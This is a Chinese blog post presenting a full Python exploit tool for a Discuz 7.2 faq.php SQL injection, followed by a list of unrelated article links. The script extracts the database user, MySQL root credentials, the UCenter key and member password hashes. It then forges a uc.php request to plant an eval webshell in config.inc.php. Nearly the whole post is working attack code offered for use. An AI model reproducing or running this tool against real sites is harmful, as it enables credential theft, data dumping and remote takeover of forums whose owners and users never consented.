Python写的Discuz7.2版faq.php注入漏洞工具


Posted in Python onAugust 06, 2014

Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者)

实现代码:

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: gb2312 -*-
# -*- coding: utf_8 -*- 
# author iswin 
import sys
import hashlib
import time
import math
import base64
import urllib2 
import urllib
import re

def sendRequest(url,para):
	try:
		data = urllib.urlencode(para)
		req=urllib2.Request(url,data)
		res=urllib2.urlopen(req,timeout=20).read()
	except Exception, e:
		print 'Exploit Failed!\n%s'%(e)
		exit(0);
	return res

def getTablePrefix(url):
	print 'Start GetTablePrefix...'
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select hex(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para);
	pre=re.findall("Duplicate entry '(.*?)'",res);
	if len(pre)==0:
		print 'Exploit Failed!'
		exit(0);
	table_pre=pre[0][:len(pre[0])-1].decode('hex')
	table_pre=table_pre[0:table_pre.index('_')]
	print 'Table_pre:%s'%(table_pre)
	return table_pre

def getCurrentUser(url):
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para)
	pre=re.findall("Duplicate entry '(.*?)'",res)
	if len(pre)==0:
		print 'Exploit Failed!'
		exit(0);
	table_pre=pre[0][:len(pre[0])-1]
	print 'Current User:%s'%(table_pre)
	return table_pre

def getUcKey(url):
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,1,62) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	para1={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,63,2) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para);
	res1=sendRequest(url,para1);
	key1=re.findall("Duplicate entry '(.*?)'",res)
	key2=re.findall("Duplicate entry '(.*?)'",res1)
	if len(key1)==0:
		print 'Get Uc_Key Failed!'
		return ''
	key=key1[0][:len(key1[0])-1]+key2[0][:len(key2[0])-1]
	print 'uc_key:%s'%(key)
	return key

def getRootUser(url):
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(user,0x20,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para);
	pre=re.findall("Duplicate entry '(.*?)'",res)
	if len(pre)==0:
		print 'Exploit Failed!'
		exit(0);
	table_pre=pre[0][:len(pre[0])-1].split(' ')
	print 'root info:\nuser:%s password:%s'%(table_pre[0],table_pre[1])

def dumpData(url,table_prefix,count):
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(username,0x20,password) from %s_members limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'%(table_prefix,count)}
	res=sendRequest(url,para);
	datas=re.findall("Duplicate entry '(.*?)'",res)
	if len(datas)==0:
		print 'Exploit Failed!'
		exit(0)
	cleandata=datas[0][:len(datas[0])-1]
	info=cleandata.split(' ')
	print 'user:%s pass:%s'%(info[0],info[1])

def microtime(get_as_float = False) :
  if get_as_float:
    return time.time()
  else:
    return '%.8f %d' % math.modf(time.time())
 
def get_authcode(string, key = ''):
  ckey_length = 4
  key = hashlib.md5(key).hexdigest()
  keya = hashlib.md5(key[0:16]).hexdigest()
  keyb = hashlib.md5(key[16:32]).hexdigest()
  keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
  cryptkey = keya + hashlib.md5(keya+keyc).hexdigest() 
  key_length = len(cryptkey)
  string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string
  string_length = len(string)
  result = ''
  box = range(0, 256)
  rndkey = dict()
  for i in range(0,256):
    rndkey[i] = ord(cryptkey[i % key_length])
  j=0
  for i in range(0,256):
    j = (j + box[i] + rndkey[i]) % 256
    tmp = box[i]
    box[i] = box[j]
    box[j] = tmp
  a=0
  j=0
  for i in range(0,string_length):
    a = (a + 1) % 256
    j = (j + box[a]) % 256
    tmp = box[a]
    box[a] = box[j]
    box[j] = tmp
    result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
  return keyc + base64.b64encode(result).replace('=', '')
 
def get_shell(url,key,host):
  headers={'Accept-Language':'zh-cn',
  'Content-Type':'application/x-www-form-urlencoded',
  'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
  'Referer':url
  }
  tm = time.time()+10*3600
  tm="time=%d&action=updateapps" %tm
  code = urllib.quote(get_authcode(tm,key))
  url=url+"?code="+code
  data1='''<?xml version="1.0" encoding="ISO-8859-1"?>
      <root>
      <item id="UC_API">http://xxx\');eval($_POST[3]);//</item>
      </root>'''
  try:
    req=urllib2.Request(url,data=data1,headers=headers)
    ret=urllib2.urlopen(req)
  except:
    return "Exploit Falied"
  data2='''<?xml version="1.0" encoding="ISO-8859-1"?>
      <root>
      <item id="UC_API">http://aaa</item>
      </root>'''
  try:
    req=urllib2.Request(url,data=data2,headers=headers)
    ret=urllib2.urlopen(req)
  except:
    return "error"

  try:
  	req=urllib2.Request(host+'/config.inc.php')
  	res=urllib2.urlopen(req,timeout=20).read()
  except Exception, e:
  	print 'GetWebshell Failed,%s'%(e)
   	return
  print "webshell:"+host+"/config.inc.php,password:3"

if __name__ == '__main__':
	print 'DZ7.x Exp Code By iswin'
	if len(sys.argv)<3:
		print 'DZ7.x Exp Code By iswin\nusage:python dz7.py https://3water.com 10'
		exit(0)
	url=sys.argv[1]+'/faq.php'
	count=int(sys.argv[2])
	user=getCurrentUser(url)
	if user.startswith('root@'):
		getRootUser(url)
	uc_key=getUcKey(url)
	if len(uc_key)==64:
		print 'Start GetWebshell...'
		get_shell(sys.argv[1]+'/api/uc.php',uc_key,sys.argv[1])
	tb_pre=getTablePrefix(url)
	print 'Start DumpData...'
	for x in xrange(0,count):
		dumpData(url,tb_pre,x)
Python 相关文章推荐
python根据经纬度计算距离示例
Feb 16 Python
Python random模块(获取随机数)常用方法和使用例子
May 13 Python
python发送HTTP请求的方法小结
Jul 08 Python
python 实现红包随机生成算法的简单实例
Jan 04 Python
正确理解python中的关键字“with”与上下文管理器
Apr 21 Python
pygame 精灵的行走及二段跳的实现方法(必看篇)
Jul 10 Python
python利用urllib和urllib2访问http的GET/POST详解
Sep 27 Python
Python基于requests库爬取网站信息
Mar 02 Python
完美解决Pycharm中matplotlib画图中文乱码问题
Jan 11 Python
python re模块常见用法例举
Mar 01 Python
Django集成富文本编辑器summernote的实现步骤
May 31 Python
Python 一键获取电脑浏览器的账号密码
May 11 Python
Python常用列表数据结构小结
Aug 06 #Python
Python生成pdf文件的方法
Aug 04 #Python
Tornado Web服务器多进程启动的2个方法
Aug 04 #Python
Python通过解析网页实现看报程序的方法
Aug 04 #Python
基于Python实现的扫雷游戏实例代码
Aug 01 #Python
python脚本实现查找webshell的方法
Jul 31 #Python
用python删除java文件头上版权信息的方法
Jul 31 #Python
You might like
php 归并排序 数组交集
2011/05/10 PHP
PHP 布尔值的自增与自减的实现方法
2018/05/03 PHP
PHP自动识别当前使用移动终端
2018/05/21 PHP
Thinkphp5框架简单实现钩子(Hook)行为的方法示例
2019/09/03 PHP
js中更短的 Array 类型转换
2011/10/30 Javascript
JavaScript实现维吉尼亚(Vigenere)密码算法实例
2013/11/22 Javascript
浅谈Javascript数组的使用
2015/07/29 Javascript
基于JavaScript实现通用tab选项卡(通用性强)
2016/01/07 Javascript
利用SpringMVC过滤器解决vue跨域请求的问题
2018/02/10 Javascript
JS实现读取xml内容并输出到div中的方法示例
2018/04/19 Javascript
vue 点击按钮增加一行的方法
2018/09/07 Javascript
浅谈Vue服务端渲染框架Nuxt的那些事
2018/12/21 Javascript
js中数组常用方法总结(推荐)
2019/04/09 Javascript
vue实现扫码功能
2020/01/17 Javascript
JS创建自定义对象的六种方法总结
2020/12/15 Javascript
[56:35]DOTA2上海特级锦标赛C组小组赛#1 OG VS Archon第二局
2016/02/27 DOTA
[01:35:53]完美世界DOTA2联赛PWL S3 Magma vs GXR 第二场 12.13
2020/12/17 DOTA
Python 异常处理实例详解
2014/03/12 Python
实例解析Python设计模式编程之桥接模式的运用
2016/03/02 Python
Python实现购物车程序
2018/04/16 Python
Python使用progressbar模块实现的显示进度条功能
2018/05/31 Python
python求最大连续子数组的和
2018/07/07 Python
Pandas读取MySQL数据到DataFrame的方法
2018/07/25 Python
python实现自动解数独小程序
2019/01/21 Python
基于Python实现剪切板实时监控方法解析
2019/09/11 Python
用CSS3实现Win8风格的方格导航菜单效果
2013/04/10 HTML / CSS
HTML5实践-图片设置成灰度图
2012/11/12 HTML / CSS
莫斯科珠宝厂官方网站:Miuz
2020/09/19 全球购物
预备党员政审材料
2014/02/04 职场文书
男方婚礼答谢词
2015/01/20 职场文书
感谢信范文大全
2015/01/23 职场文书
2015年幼儿园后勤工作总结
2015/04/25 职场文书
一百条裙子读书笔记
2015/07/01 职场文书
2019事业单位个人工作总结范文
2019/08/26 职场文书
解决pycharm安装scrapy DLL load failed:找不到指定的程序的问题
2021/06/08 Python
总结Python连接CS2000的详细步骤
2021/06/23 Python